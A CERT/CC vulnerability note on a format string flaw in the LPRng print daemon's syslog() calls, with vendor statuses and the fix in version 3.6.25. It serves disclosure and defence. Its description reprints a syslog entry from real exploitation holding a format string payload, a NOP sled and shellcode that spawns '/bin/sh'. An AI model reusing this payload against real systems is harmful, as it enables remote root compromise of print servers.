search menu icon-carat-right cmu-wordmark

CERT Coordination Center


LPRng can pass user-supplied input as a format string parameter to syslog() calls

Vulnerability Note VU#382365

Original Release Date: 2000-12-04 | Last Revised: 2003-01-27

Overview

A popular replacement software package to the BSD lpd printing service called LPRng contains at least one software defect known as a "format string vulnerability" which may allow remote users to execute arbitrary code on vulnerable systems. The privileges of such code will probably be root-level.

Description

LPRng, the "next generation" of print-service management software now being packaged in several open-source operating system distributions, has a missing format string argument in at least two calls to the syslog() function. Missing format strings in function calls which allow user-supplied arguments to be passed to a susceptible *snprintf() function call may allow remote users with access to the printer port (port 515/tcp) to pass format-string parameters that can overwrite arbitrary addresses in the printing service's address space. Such overwriting can cause segmentation violations leading to denial of printing services or lead to the execution of arbitrary code injected through other means into the memory segments of the printer service.

The vulnerable calls in this case occur in the following section of code:

LPRng-3.6.24/src/common/errormsg.c, use_syslog()
---
static void use_syslog(int kind, char *msg)
[...]
# ifdef HAVE_OPENLOG
        /* use the openlog facility */
        openlog(Name, LOG_PID | LOG_NOWAIT, SYSLOG_FACILITY );
        syslog(kind, msg);
        closelog();

# else
    (void) syslog(SYSLOG_FACILITY | kind, msg);
# endif                                                 /* HAVE_OPENLOG */
[...]


Sample syslog entries from exploitation of this vulnerability:

Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'

Impact

A remote user may be able to execute arbitrary code or perpetuate a denial of service. The privileges the malicious code would have depends on whether the print daemon drops it's root privileges before or after the calls to the vulnerable syslog() functions.

Solution

Upgrade to non-vulnerable version of LPRng (3.6.25), as described in the vendors sections below.

Disallow access to printer service ports (typically 515/tcp) using firewall or packet-filtering technologies.

Vendor Information

382365
Expand all

Debian

Notified:  December 06, 2000 Updated:  December 07, 2000

Status

  Vulnerable

Vendor Statement

None available.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Please see:

http://lists.debian.org/debian-security-0011/msg00212.html

If you have feedback, comments, or additional information about this vulnerability, please send us email.

FreeBSD

Notified:  December 06, 2000 Updated:  December 11, 2000

Status

  Vulnerable

Vendor Statement

FreeBSD does not include LPRng in the base system. Older versions of FreeBSD included a vulnerable version of LPRng in the Ports

Collection but this was corrected almost 2 months ago, prior to the release of FreeBSD 4.2. See FreeBSD Security Advisory 00:56 (ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lprng.asc) for more information.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

While the default FreeBSD install is not vulnerable to this issue, users runnning the LPRng included the Ports Collections prior to 4.2 should immediately upgrade to the LPRng-3.6.25 in the latest sysutils package.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

NetBSD

Notified:  December 06, 2000 Updated:  December 11, 2000

Status

  Vulnerable

Vendor Statement

NetBSD does not include LPRng in the base system; however we do have a

third-party package of LPRng-3.6.8 which is vulnerable.

There's work underway to upgrade it to a non-vulnerable version.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Patrick Powell

Updated:  December 05, 2000

Status

  Vulnerable

Vendor Statement

Patrick Powell is the author responsible for development of this version of LPRng.

Extract from CHANGES in LPRng-3.6.25 distribution at:

ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz

Release LPRng 3.6.25 Tue Oct 3 09:19:11 PDT 2000
syslog Compromise -
modified syslog to use 'syslog(xx,"%s", msg).
gettext Compromise -
added the following to Initialize():
if( getuid() == 0 || geteuid() == 0 ) unsetenv("NLSPATH");

See the various CERT advisories. Sigh...

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Red Hat Inc.

Notified:  September 26, 2000 Updated:  January 27, 2003

Status

  Vulnerable

Vendor Statement

LPRng Version 3.6.24 and earlier is vulnerable. See RHSA-2000:065 at:

http://www.redhat.com/support/errata/RHSA-2000-065.html

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has recieved reports of this vulnerability being scanned for on systems installed with vulnerable versions of LPRng.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

The SCO Group (SCO Linux)

Updated:  December 05, 2000

Status

  Vulnerable

Vendor Statement

See CSSA-2000-033.0 "format bug in LPRng" at :

http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Trustix

Updated:  December 04, 2000

Status

  Vulnerable

Vendor Statement

See Trustix Secure Linux updates at:

http://www.trustix.net/download/Trustix/updates/1.1/RPMS/LPRng-3.6.24-1tr.i586.rpm

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Apple Computer Inc.

Notified:  December 06, 2000 Updated:  December 11, 2000

Status

  Not Vulnerable

Vendor Statement

Apple has conducted an investigation and determined that Mac OS X Public Beta and Mac OS X Server do not use LPRng and are therefore not vulnerable to this exploitation.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Compaq Computer Corporation

Notified:  December 06, 2000 Updated:  December 11, 2000

Status

  Not Vulnerable

Vendor Statement

Compaq Tru64 UNIX S/W is not vulnerable.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Hewlett-Packard Company

Notified:  December 06, 2000 Updated:  December 11, 2000

Status

  Not Vulnerable

Vendor Statement

This does not apply to HP; HP does not ship LPRng on HP-UX.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

IBM

Notified:  December 06, 2000 Updated:  December 11, 2000

Status

  Not Vulnerable

Vendor Statement

IBM's AIX operating system is not vulnerable to this security exploit.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Microsoft Corporation

Notified:  December 06, 2000 Updated:  December 11, 2000

Status

  Not Vulnerable

Vendor Statement

Microsoft doesn't use LPRng in any of its products, so no Microsoft products are affected by the vulnerability.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

OpenBSD

Notified:  December 06, 2000 Updated:  December 07, 2000

Status

  Not Vulnerable

Vendor Statement

openbsd does not ship lprng.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

SGI

Notified:  December 06, 2000 Updated:  December 12, 2000

Status

  Not Vulnerable

Vendor Statement

IRIX does not contain LPRng support.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

SuSE Inc.

Updated:  December 05, 2000

Status

  Not Vulnerable

Vendor Statement

SuSE is not vulnerable. Please see additional comments at:

http://lists.suse.com/archives/suse-security/2000-Sep/0259.html

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

The CERT/CC has no additional comments at this time.

If you have feedback, comments, or additional information about this vulnerability, please send us email.


CVSS Metrics

Group Score Vector
Base N/A N/A
Temporal N/A N/A
Environmental N/A

References

Credit

Thanks to Chris Evans for making this code sample public.

This document was written by Jeffrey S Havrilla.

Other Information

CVE IDs: CVE-2000-0917
CERT Advisory: CA-2000-22
Severity Metric: 48.20
Date Public: 2000-09-25
Date First Published: 2000-12-04
Date Last Updated: 2003-01-27 19:16 UTC
Document Revision: 41

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.